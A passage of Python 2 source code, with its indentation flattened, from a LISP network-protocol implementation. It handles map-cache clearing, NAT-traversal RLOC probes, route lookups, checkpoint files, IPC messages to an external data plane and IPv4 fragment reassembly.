global lisp_rtr_list
clear = bold("User cleared", False)
count = lisp_map_cache.cache_count
lprint("{} map-cache with {} entries".format(clear, count))
if (lisp_program_hardware):
lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
#endif
lisp_map_cache = lisp_cache()
#
# Need to clear the RLOC-probe list or else we'll have RLOC-probes
# create incomplete RLOC-records.
#
lisp_rloc_probe_list = {}
#
# Also clear the encap and decap lisp-crypto arrays.
#
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
#
# If we are an ITR, clear the RTR-list so a new set of default routes can
# be added when the next Info-Reply comes in.
#
lisp_rtr_list = {}
#
# Tell external data-plane.
#
lisp_process_data_plane_restart(True)
return
#enddef
#
# lisp_encapsulate_rloc_probe
#
# Input to this function is a RLOC-probe Map-Request and the NAT-traversal
# information for an ETR that sits behind a NAT. We need to get the RLOC-probe
# through the NAT so we have to data encapsulated with a source-port of 4341
# and a destination adddress and port that was translated by the NAT. That
# information is in the lisp_nat_info() class.
#
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
if (len(lisp_sockets) != 4): return
local_addr = lisp_myrlocs[0]
#
# Build Map-Request IP header. Source and destination addresses same as
# the data encapsulation outer header.
#
length = len(packet) + 28
ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
ip = lisp_ip_checksum(ip)
udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
socket.htons(length - 20), 0)
#
# Start data encapsulation logic.
#
packet = lisp_packet(ip + udp + packet)
#
# Setup fields we need for lisp_packet.encode().
#
packet.inner_dest.copy_address(rloc)
packet.inner_dest.instance_id = 0xffffff
packet.inner_source.copy_address(local_addr)
packet.inner_ttl = 64
packet.outer_dest.copy_address(rloc)
packet.outer_source.copy_address(local_addr)
packet.outer_version = packet.outer_dest.afi_to_version()
packet.outer_ttl = 64
packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT
rloc_str = red(rloc.print_address_no_iid(), False)
if (nat_info):
hostname = " {}".format(blue(nat_info.hostname, False))
probe = bold("RLOC-probe request", False)
else:
hostname = ""
probe = bold("RLOC-probe reply", False)
#endif
lprint(("Data encapsulate {} to {}{} port {} for " + \
"NAT-traversal").format(probe, rloc_str, hostname, packet.encap_port))
#
# Build data encapsulation header.
#
if (packet.encode(None) == None): return
packet.print_packet("Send", True)
raw_socket = lisp_sockets[3]
packet.send_packet(raw_socket, packet.outer_dest)
del(packet)
return
#enddef
#
# lisp_get_default_route_next_hops
#
# Put the interface names of each next-hop for the IPv4 default in an array
# and return to caller. The array has elements of [<device>, <nh>].
#
def lisp_get_default_route_next_hops():
#
# Get default route next-hop info differently for MacOS.
#
if (lisp_is_macos()):
cmd = "route -n get default"
fields = commands.getoutput(cmd).split("\n")
gw = interface = None
for f in fields:
if (f.find("gateway: ") != -1): gw = f.split(": ")[1]
if (f.find("interface: ") != -1): interface = f.split(": ")[1]
#endfor
return([[interface, gw]])
#endif
#
# Get default route next-hop info for Linuxes.
#
cmd = "ip route | egrep 'default via'"
default_routes = commands.getoutput(cmd).split("\n")
next_hops = []
for route in default_routes:
if (route.find(" metric ") != -1): continue
r = route.split(" ")
try:
via_index = r.index("via") + 1
if (via_index >= len(r)): continue
dev_index = r.index("dev") + 1
if (dev_index >= len(r)): continue
except:
continue
#endtry
next_hops.append([r[dev_index], r[via_index]])
#endfor
return(next_hops)
#enddef
#
# lisp_get_host_route_next_hop
#
# For already installed host route, get next-hop.
#
def lisp_get_host_route_next_hop(rloc):
cmd = "ip route | egrep '{} via'".format(rloc)
route = commands.getoutput(cmd).split(" ")
try: index = route.index("via") + 1
except: return(None)
if (index >= len(route)): return(None)
return(route[index])
#enddef
#
# lisp_install_host_route
#
# Install/deinstall host route.
#
def lisp_install_host_route(dest, nh, install):
install = "add" if install else "delete"
nh_str = "none" if nh == None else nh
lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_str))
if (nh == None):
ar = "ip route {} {}/32".format(install, dest)
else:
ar = "ip route {} {}/32 via {}".format(install, dest, nh)
#endif
os.system(ar)
return
#enddef
#
# lisp_checkpoint
#
# This function will write entries from the checkpoint array to the checkpoint
# file "lisp.checkpoint".
#
def lisp_checkpoint(checkpoint_list):
if (lisp_checkpoint_map_cache == False): return
f = open(lisp_checkpoint_filename, "w")
for entry in checkpoint_list:
f.write(entry + "\n")
#endfor
f.close()
lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
len(checkpoint_list), lisp_checkpoint_filename))
return
#enddef
#
# lisp_load_checkpoint
#
# Read entries from checkpoint file and write to map cache. Check function
# lisp_write_checkpoint_entry() for entry format description.
#
def lisp_load_checkpoint():
if (lisp_checkpoint_map_cache == False): return
if (os.path.exists(lisp_checkpoint_filename) == False): return
f = open(lisp_checkpoint_filename, "r")
count = 0
for entry in f:
count += 1
e = entry.split(" rloc ")
rlocs = [] if (e[1] in ["native-forward\n", "\n"]) else \
e[1].split(", ")
rloc_set = []
for rloc in rlocs:
rloc_entry = lisp_rloc(False)
r = rloc.split(" ")
rloc_entry.rloc.store_address(r[0])
rloc_entry.priority = int(r[1])
rloc_entry.weight = int(r[2])
rloc_set.append(rloc_entry)
#endfor
mc = lisp_mapping("", "", rloc_set)
if (mc != None):
mc.eid.store_prefix(e[0])
mc.checkpoint_entry = True
mc.map_cache_ttl = LISP_NMR_TTL * 60
if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
mc.add_cache()
continue
#endif
count -= 1
#endfor
f.close()
lprint("{} {} map-cache entries from file '{}'".format(
bold("Loaded", False), count, lisp_checkpoint_filename))
return
#enddef
#
# lisp_write_checkpoint_entry
#
# Write one map-cache entry to checkpoint array list. The format of a
# checkpoint entry is:
#
# [<iid>]<eid-prefix> rloc <rloc>, <rloc>, ...
#
# where <rloc> is formatted as:
#
# <rloc-address> <priority> <weight>
#
def lisp_write_checkpoint_entry(checkpoint_list, mc):
if (lisp_checkpoint_map_cache == False): return
entry = "{} rloc ".format(mc.eid.print_prefix())
for rloc_entry in mc.rloc_set:
if (rloc_entry.rloc.is_null()): continue
entry += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
rloc_entry.priority, rloc_entry.weight)
#endfor
if (mc.rloc_set != []):
entry = entry[0:-2]
elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
entry += "native-forward"
#endif
checkpoint_list.append(entry)
return
#enddef
#
# lisp_check_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_check_dp_socket():
socket_name = lisp_ipc_dp_socket_name
if (os.path.exists(socket_name) == False):
dne = bold("does not exist", False)
lprint("Socket '{}' {}".format(socket_name, dne))
return(False)
#endif
return(True)
#enddef
#
# lisp_write_to_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_write_to_dp_socket(entry):
try:
rec = json.dumps(entry)
write = bold("Write IPC", False)
lprint("{} record to named socket: '{}'".format(write, rec))
lisp_ipc_dp_socket.sendto(rec, lisp_ipc_dp_socket_name)
except:
lprint("Failed to write IPC record to named socket: '{}'".format(rec))
#endtry
return
#enddef
#
# lisp_write_ipc_keys
#
# Security keys have changed for an RLOC. Find all map-cache entries that are
# affected. The lisp_rloc_probe_rlocs has the list of EIDs for a given RLOC
# address. Tell the external data-plane for each one.
#
def lisp_write_ipc_keys(rloc):
addr_str = rloc.rloc.print_address_no_iid()
port = rloc.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
for r, e, g in lisp_rloc_probe_list[addr_str]:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc == None): continue
lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_write_ipc_map_cache
#
# Write a map-cache entry to named socket "lisp-ipc-data-plane".
#
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
add = "add" if add_or_delete else "delete"
entry = { "type" : "map-cache", "opcode" : add }
multicast = (mc.group.is_null() == False)
if (multicast):
entry["eid-prefix"] = mc.group.print_prefix_no_iid()
entry["rles"] = []
else:
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
entry["rlocs"] = []
#endif
entry["instance-id"] = str(mc.eid.instance_id)
if (multicast):
if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
addr = rle_node.address.print_address_no_iid()
port = str(4341) if rle_node.translated_port == 0 else \
str(rle_node.translated_port)
r = { "rle" : addr, "port" : port }
ekey, ikey = rle_node.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rles"].append(r)
#endfor
#endif
else:
for rloc in mc.rloc_set:
if (rloc.rloc.is_ipv4() == False and rloc.rloc.is_ipv6() == False):
continue
#endif
if (rloc.up_state() == False): continue
port = str(4341) if rloc.translated_port == 0 else \
str(rloc.translated_port)
r = { "rloc" : rloc.rloc.print_address_no_iid(), "priority" :
str(rloc.priority), "weight" : str(rloc.weight), "port" :
port }
ekey, ikey = rloc.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rlocs"].append(r)
#endfor
#endif
if (dont_send == False): lisp_write_to_dp_socket(entry)
return(entry)
#enddef
#
# lisp_write_ipc_decap_key
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_decap_key(rloc_addr, keys):
if (lisp_i_am_itr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Get decryption key. If there is none, do not send message.
#
if (keys == None or len(keys) == 0 or keys[1] == None): return
ekey = keys[1].encrypt_key
ikey = keys[1].icv_key
#
# Write record in JSON format. Store encryption key.
#
rp = rloc_addr.split(":")
if (len(rp) == 1):
entry = { "type" : "decap-keys", "rloc" : rp[0] }
else:
entry = { "type" : "decap-keys", "rloc" : rp[0], "port" : rp[1] }
#endif
entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_build_json_keys
#
# Build the following for both the ITR encryption side and the ETR decryption
# side.
#
def lisp_build_json_keys(entry, ekey, ikey, key_type):
if (ekey == None): return(entry)
entry["keys"] = []
key = { "key-id" : "1", key_type : ekey, "icv-key" : ikey }
entry["keys"].append(key)
return(entry)
#enddef
#
# lisp_write_ipc_database_mappings
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_database_mappings(ephem_port):
if (lisp_i_am_etr == False): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format. Store encryption key.
#
entry = { "type" : "database-mappings", "database-mappings" : [] }
#
# Write only IPv4 and IPv6 EIDs.
#
for db in lisp_db_list:
if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
record = { "instance-id" : str(db.eid.instance_id),
"eid-prefix" : db.eid.print_prefix_no_iid() }
entry["database-mappings"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
#
# Write ephemeral NAT port an external data-plane needs to receive
# encapsulated packets from the RTR.
#
entry = { "type" : "etr-nat-port", "port" : ephem_port }
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_write_ipc_interfaces
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_interfaces():
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format. Store encryption key.
#
entry = { "type" : "interfaces", "interfaces" : [] }
for interface in lisp_myinterfaces.values():
if (interface.instance_id == None): continue
record = { "interface" : interface.device,
"instance-id" : str(interface.instance_id) }
entry["interfaces"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_parse_auth_key
#
# Look for values for "authentication-key" in the various forms of:
#
# <password>
# [<key-id>]<password>
# [<key-id>]<password> [<key-id>]<password> [<key-id>]<password>
#
# Return a auth_key{} where the keys from the dictionary array are type
# integers and the values are type string.
#
def lisp_parse_auth_key(value):
values = value.split("[")
auth_key = {}
if (len(values) == 1):
auth_key[0] = value
return(auth_key)
#endif
for v in values:
if (v == ""): continue
index = v.find("]")
key_id = v[0:index]
try: key_id = int(key_id)
except: return
auth_key[key_id] = v[index+1::]
#endfor
return(auth_key)
#enddef
#
# lisp_reassemble
#
# Reassemble an IPv4 datagram. The result is a LISP encapsulated packet.
#
# An entry in the queue is a multi-tuple of:
#
# <frag-offset>, <frag-length>, <packet-with-header>, <last-frag-is-true>
#
# When it is not a LISP/VXLAN encapsualted packet, the multi-tuple will be
# for the first fragment:
#
# <frag-offset>, <frag-length>, None, <last-frag-is-true>
#
def lisp_reassemble(packet):
fo = socket.ntohs(struct.unpack("H", packet[6:8])[0])
#
# Not a fragment, return packet and process.
#
if (fo == 0 or fo == 0x4000): return(packet)
#
# Get key fields from fragment.
#
ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
fl = socket.ntohs(struct.unpack("H", packet[2:4])[0])
last_frag = (fo & 0x2000 == 0 and (fo & 0x1fff) != 0)
entry = [(fo & 0x1fff) * 8, fl - 20, packet, last_frag]
#
# If first fragment, check to see if LISP packet. Do not reassemble if
# source or destination port is not 4341, 8472 or 4789. But add this to
# the queue so when other fragments come in, we know to not queue them.
# If other fragments came in before the first fragment, remove them from
# the queue.
#
if (fo == 0x2000):
sport, dport = struct.unpack("HH", packet[20:24])
sport = socket.ntohs(sport)
dport = socket.ntohs(dport)
if (dport not in [4341, 8472, 4789] and sport != 4341):
lisp_reassembly_queue[ident] = []
entry[2] = None
#endif
#endif
#
# Initialized list if first fragment. Indexed by IPv4 Ident.
#
if (lisp_reassembly_queue.has_key(ident) == False):
lisp_reassembly_queue[ident] = []
#endif
#
# Get fragment queue based on IPv4 Ident.
#
queue = lisp_reassembly_queue[ident]
#
# Do not queue fragment if first fragment arrived and we determined its
# not a LISP encapsulated packet.
#
if (len(queue) == 1 and queue[0][2] == None):
dprint("Drop non-LISP encapsulated fragment 0x{}".format( \
lisp_hex_string(ident).zfill(4)))
return(None)
#endif
#
# Insert in sorted order.
#
queue.append(entry)
queue = sorted(queue)
#
# Print addresses.
#
addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
src = addr.print_address_no_iid()
addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
dst = addr.print_address_no_iid()
addr = red("{} -> {}".format(src, dst), False)
dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format( \
bold("Received", False), " non-LISP encapsulated" if \
entry[2] == None else "", addr, lisp_hex_string(ident).zfill(4),
lisp_hex_string(fo).zfill(4)))
#
# Check if all fragments arrived. First check if first and last fragments
# are in queue.
#
if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
last_entry = queue[0]
for frag in queue[1::]:
fo = frag[0]
last_fo, last_fl = last_entry[0], last_entry[1]
if (last_fo + last_fl != fo): return(None)
last_entry = frag
#endfor
lisp_reassembly_queue.pop(ident)
#
# If we did not return, we have all fragments. Now append them. Keep the
# IP header in the first fragment but remove in each other fragment.
#
packet = queue[0][2]
for frag in queue[1::]: packet += frag[2][20::]
dprint("{} fragments arrived for packet 0x{}, length {}".format( \
bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))
#
# Fix length and frag-offset field before returning and fixup checksum.
#
length = socket.htons(len(packet))
header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
packet[12:20]
header = lisp_ip_checksum(header)
return(header + packet[20::])
#enddef
#
# lisp_get_crypto_decap_lookup_key
#
# Return None if we cannot find <addr>:<<port> or <addr>:0 in lisp_crypto_
# keys_by_rloc_decap{}.
#
def lisp_get_crypto_decap_lookup_key(addr, port):
addr_str = addr.print_address_no_iid() + ":" + str(port)
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
addr_str = addr.print_address_no_iid()
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
#
# We are at non-NAT based xTR. We need to get the keys from an RTR
# or another non-NAT based xTR. Move addr+port to addr.
#
for ap in lisp_crypto_keys_by_rloc_decap:
a = ap.split(":")
if (len(a) == 1): continue
a = a[0] if len(a) == 2 else ":".join(a[0:-1])
if (a == addr_str):
keys = lisp_crypto_keys_by_rloc_decap[ap]
lisp_crypto_keys_by_rloc_decap[addr_str] = keys
return(addr_str)
#endif
#endfor
return(None)
#enddef
#
# lisp_build_crypto_decap_lookup_key
#
# Decide to return <addr>:<port> or <addr> depending if the RLOC is behind
# a NAT. This is used on the RTR. Check the lisp probing cache. If we find
# an RLOC with a port number stored, then it is behind a NAT. Otherwise,
# the supplied port is not relevant and we want to create a "port-less" decap
# entry for an xTR that is in public address space.
#
def lisp_build_crypto_decap_lookup_key(addr, port):
addr = addr.print_address_no_iid()
addr_and_port = addr + ":" + str(port)
if (lisp_i_am_rtr):
if (lisp_rloc_probe_list.has_key(addr)): return(addr)
#
# Have to check NAT cache to see if RLOC is translated. If not, this
# is an xTR in public space. We'll have to change this in the future
# so we don't do a full table traversal. But this only happensu
#
for nat_info in lisp_nat_state_info.values():
for nat in nat_info:
if (addr == nat.address): return(addr_and_port)
#endfor
#endif
return(addr)
#endif
return(addr_and_port)
#enddef
#
# lisp_set_ttl
#
# Set send IP TTL for outgoing packet.
#
def lisp_set_ttl(lisp_socket, ttl):
try:
lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
except:
lprint("socket.setsockopt(IP_TTL) not supported")
pass
#endtry
return
#enddef
#
# lisp_is_rloc_probe_request
#
# Pass LISP first byte to test for 0x12, a Map-Request RLOC-probe.
#
def lisp_is_rloc_probe_request(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x12)
#enddef
#
# lisp_is_rloc_probe_reply
#
# Pass LISP first byte to test for 0x28, a Map-Reply RLOC-probe.
#
def lisp_is_rloc_probe_reply(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x28)
#enddef
#
# lisp_is_rloc_probe
#
# If this is a RLOC-probe received by the data-plane (from a pcap filter),
# then return source address, source port, ttl, and position packet to the
# beginning of the LISP header. The packet pointer entering this function is
# the beginning of an IPv4 header.
#
# If rr (request-or-reply) is:
#
# 0: Check for Map-Request RLOC-probe (ETR case)
# 1: Check for Map-Reply RLOC-probe (ITR case)
# -1: Check for either (RTR case)
#
# Return packet pointer untouched if not an RLOC-probe. If it is an RLOC-probe
# request or reply from ourselves, return packet pointer None and source None.
#
def lisp_is_rloc_probe(packet, rr):
udp = (struct.unpack("B", packet[9])[0] == 17)
if (udp == False): return([packet, None, None, None])
sport = struct.unpack("H", packet[20:22])[0]
dport = struct.unpack("H", packet[22:24])[0]
is_lisp = (socket.htons(LISP_CTRL_PORT) in [sport, dport])
if (is_lisp == False): return([packet, None, None, None])
if (rr == 0):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == 1):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == -1):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
#endif
#endif
#
# Get source address, source port, and TTL. Decrement TTL.
#
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
#
# If this is a RLOC-probe from ourselves, drop.
#
if (source.is_local()): return([None, None, None, None])
#
# Accept, and return source, port, and ttl to caller.
#
source = source.print_address_no_iid()
port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
ttl = struct.unpack("B", packet[8])[0] - 1
packet = packet[28::]
r = bold("Receive(pcap)", False)
f = bold("from " + source, False)
p = lisp_format_packet(packet)
lprint("{} {} bytes {} {}, packet: {}".format(r, len(packet), f, port, p))
return([packet, source, port, ttl])
#enddef
#
# lisp_ipc_write_xtr_parameters
#
# When an external data-plane is running, write the following parameters
# to it:
#
# ipc = { "type" : "xtr-parameters", "control-plane-logging" : False,
# "data-plane-logging" : False, "rtr" : False }
#
def lisp_ipc_write_xtr_parameters(cp, dp):
if (lisp_ipc_dp_socket == None): return
ipc = { "type" : "xtr-parameters", "control-plane-logging" : cp,
"data-plane-logging" : dp, "rtr" : lisp_i_am_rtr }
lisp_write_to_dp_socket(ipc)
return
#enddef
#
# lisp_external_data_plane
#
# Return True if an external data-plane is running. That means that "ipc-data-
# plane = yes" is configured or the lisp-xtr go binary is running.
#
def lisp_external_data_plane():
cmd = 'egrep "ipc-data-plane = yes" ./lisp.config'
if (commands.getoutput(cmd) != ""): return(True)
if (os.getenv("LISP_RUN_LISP_XTR") != None): return(True)
return(False)
#enddef
#
# lisp_process_data_plane_restart
#
# The external data-plane has restarted. We will touch the lisp.config file so
# all configuration information is sent and then traverse the map-cache
# sending each entry to the data-plane so it can regain its state.
#
# This function will also clear the external data-plane map-cache when a user
# clears the map-cache in the lisp-itr or lisp-rtr process.
#
# { "type" : "restart" }
#
def lisp_process_data_plane_restart(do_clear=False):
os.system("touch ./lisp.config")
jdata = { "type" : "entire-map-cache", "entries" : [] }
if (do_clear == False):
entries = jdata["entries"]
lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)
#endif
lisp_write_to_dp_socket(jdata)
return
#enddef
#
# lisp_process_data_plane_stats
#
# { "type" : "statistics", "entries" :
# [ { "instance-id" : "<iid>", "eid-prefix" : "<eid>", "rlocs" : [
# { "rloc" : "<rloc-1>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : "<timestamp>" }, ...
# { "rloc" : "<rloc-n>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <system-uptime> } ], ... }
# ]
# }
#
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
if (msg.has_key("entries") == False):
lprint("No 'entries' in stats IPC message")
return
#endif
if (type(msg["entries"]) != list):
lprint("'entries' in stats IPC message must be an array")
return
#endif
for msg in msg["entries"]:
if (msg.has_key("eid-prefix") == False):
lprint("No 'eid-prefix' in stats IPC message")
continue
#endif
eid_str = msg["eid-prefix"]
if (msg.has_key("instance-id") == False):
lprint("No 'instance-id' in stats IPC message")
continue
#endif
iid = int(msg["instance-id"])
#
# Lookup EID-prefix in map-cache.
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(eid_str)
mc = lisp_map_cache_lookup(None, eid)
if (mc == None):
lprint("Map-cache entry for {} not found for stats update". \
format(eid_str))
continue
#endif
if (msg.has_key("rlocs") == False):
lprint("No 'rlocs' in stats IPC message for {}".format( \
eid_str))
continue
#endif
if (type(msg["rlocs"]) != list):
lprint("'rlocs' in stats IPC message must be an array")
continue
#endif
ipc_rlocs = msg["rlocs"]
#
# Loop through RLOCs in IPC message.
#
for ipc_rloc in ipc_rlocs:
if (ipc_rloc.has_key("rloc") == False): continue
rloc_str = ipc_rloc["rloc"]
if (rloc_str == "no-address"): continue
rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
rloc.store_address(rloc_str)
rloc_entry = mc.get_rloc(rloc)
if (rloc_entry == None): continue
#
# Update stats.
#
pc = 0 if ipc_rloc.has_key("packet-count") == False else \
ipc_rloc["packet-count"]
bc = 0 if ipc_rloc.has_key("byte-count") == False else \
ipc_rloc["byte-count"]
ts = 0 if ipc_rloc.has_key("seconds-last-packet") == False else \
ipc_rloc["seconds-last-packet"]
rloc_entry.stats.packet_count += pc
rloc_entry.stats.byte_count += bc
rloc_entry.stats.last_increment = lisp_get_timestamp() - ts
lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
ts, eid_str, rloc_str))
#endfor
#
# Check if this map-cache entry needs refreshing.
#
if (mc.group.is_null() and mc.has_ttl_elapsed()):
eid_str = green(mc.print_eid_tuple(), False)
lprint("Refresh map-cache entry {}".format(eid_str))
lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
#endif
#endfor
return
#enddef
#
# lisp_process_data_plane_decap_stats
#
# { "type" : "decap-statistics",
# "no-decrypt-key" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "outer-header-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "bad-inner-version" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "good-packets" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "ICV-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "checksum-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> }
# }
#
# If are an RTR, we can process the stats directly. If are an ITR we need
# to send an IPC message the the lisp-etr process.
#
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
#
# Send IPC message to lisp-etr process. Variable 'msg' is a dict array.
# Needs to be passed in IPC message as a string.
#
if (lisp_i_am_itr):
lprint("Send decap-stats IPC message to lisp-etr process")
ipc = "stats%{}".format(json.dumps(msg))
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#endif
#
# Process stats counters in lisp-etr and lisp-rtr processes. Variable 'msg'
# is a dictionary array when the ITR/RTR is processing msg. When an ETR
# is processing it, it recevied a json string from the ITR so it needs
# to convert to a dictionary array.
#
ipc = bold("IPC", False)
lprint("Process decap-stats {} message: '{}'".format(ipc, msg))
if (lisp_i_am_etr): msg = json.loads(msg)
key_names = ["good-packets", "ICV-error", "checksum-error",
"lisp-header-error", "no-decrypt-key", "bad-inner-version",
"outer-header-error"]
for key_name in key_names:
pc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["packet-count"]
lisp_decap_stats[key_name].packet_count += pc
bc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["byte-count"]
lisp_decap_stats[key_name].byte_count += bc
ts = 0 if msg.has_key(key_name) == False else \
msg[key_name]["seconds-last-packet"]
lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
#endfor
return
#enddef
#
# lisp_process_punt
#
# Another data-plane is punting a packet to us so we can discover a source
# EID, send a map-request, or store statistics data. The format of the JSON
# messages are for types: "discovery", "restart", "statistics", and "decap-
# statistics". This function calls functions for the stats and restart types
# but this function processes logic for:
#
# { "type" : "discovery", "source-eid" : <eid-source-address>,
# "dest-eid" : <eid-dest-address>, "interface" : "<device-name>",
# "instance-id" : <iid> }
#
# And:
#
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
message, source = punt_socket.recvfrom(4000)
msg = json.loads(message)
if (type(msg) != dict):
lprint("Invalid punt message from {}, not in JSON format". \
format(source))
return
#endif
punt = bold("Punt", False)
lprint("{} message from '{}': '{}'".format(punt, source, msg))
if (msg.has_key("type") == False):
lprint("Punt IPC message has no 'type' key")
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "statistics"):
lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
return
#endif
if (msg["type"] == "decap-statistics"):
lisp_process_data_plane_decap_stats(msg, punt_socket)
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "restart"):
lisp_process_data_plane_restart()
return
#endif
#
# Process possible punt packet discovery message.
#
if (msg["type"] != "discovery"):
lprint("Punt IPC message has wrong format")
return
#endif
if (msg.has_key("interface") == False):
lprint("Invalid punt message from {}, required keys missing". \
format(source))
return
#endif
#
# Drop control-messages designated as instance-ID 0xffffff (or -1 in JSON).
#
device = msg["interface"]
if (device == ""):
iid = int(msg["instance-id"])
if (iid == -1): return
else:
iid = lisp_get_interface_instance_id(device, None)
#endif
#
# Validate EID format.
#
seid = None
if (msg.has_key("source-eid")):
source_eid = msg["source-eid"]
seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
if (seid.is_null()):
lprint("Invalid source-EID format '{}'".format(source_eid))
return
#endif
#endif
deid = None
if (msg.has_key("dest-eid")):
dest_eid = msg["dest-eid"]
deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
if (deid.is_null()):
lprint("Invalid dest-EID format '{}'".format(dest_eid))
return
#endif
#endif
#
# Do source-EID discovery.
#
# Make sure we have a configured database-mapping entry for this EID.
#
if (seid):
e = green(seid.print_address(), False)
db = lisp_db_for_lookups.lookup_cache(seid, False)
if (db != None):
#
# Check accept policy and if accepted, discover EID by putting
# in discovery cache. ETR will register it.
#
if (db.dynamic_eid_configured()):
interface = lisp_allow_dynamic_eid(device, seid)
if (interface != None and lisp_i_am_itr):
lisp_itr_discover_eid(db, seid, device, interface)
else:
lprint(("Disallow dynamic source-EID {} " + \
"on interface {}").format(e, device))
#endif
#endif
else:
lprint("Punt from non-EID source {}".format(e))
#endif
#endif
#
# Do Map-Request processing on destination.
#
if (deid):
mc = lisp_map_cache_lookup(seid, deid)
if (mc == None or mc.action == LISP_SEND_MAP_REQUEST_ACTION):
#
# Check if we should rate-limit Map-Request and if not send
# Map-Request.
#
if (lisp_rate_limit_map_request(seid, deid)): return
lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
seid, deid, None)
else:
e = green(deid.print_address(), False)
lprint("Map-cache entry for {} already exists".format(e))
#endif
#endif
return
#enddef
#
# lisp_ipc_map_cache_entry
#
# Callback from class lisp_cache.walk_cache().
